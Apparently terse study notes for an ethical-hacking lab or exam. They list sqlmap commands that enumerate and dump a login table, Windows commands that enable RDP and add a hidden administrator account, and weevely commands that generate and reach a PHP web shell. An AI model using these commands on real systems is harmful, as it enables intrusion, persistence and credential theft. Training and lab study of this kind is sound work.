02_web_attack
目標: DB,Table,Column,flag 藏在 data 裡面
SQLi type
- inband: 進入點,就是輸出點
- blind: 進入點,但沒輸出
- oob:
- mysql 發 DNS
- oracle 發 HTTP
Detect
id=4-3SQL Injection
sqlmap -u <url> --cookie="user=12343"
sqlmap -r r.txt
sqlmap -r r.txt --dbs
sqlmap -r r.txt -D moveiscope --tables
sqlmap -r r.txt -D moveiscope -T User_Login --columns
sqlmap -r r.txt -D moveiscope -T User_Login --columns --technique=B
sqlmap -r r.txt -D moveiscope -T User_Login --dump --technique=BThe list of techniques with its letters is as follows:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queriesCommand Injection
- chcek rdp
netstat -an | findstr :3389- open 3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f- add cehp user
net user cehp /add- view users
net users- add into admin group
net localgroup Administrators cehp /add- view group
net localgroup AdministratorsUpload File
weevely generate cehp backdoor.phpweevely <url> cehp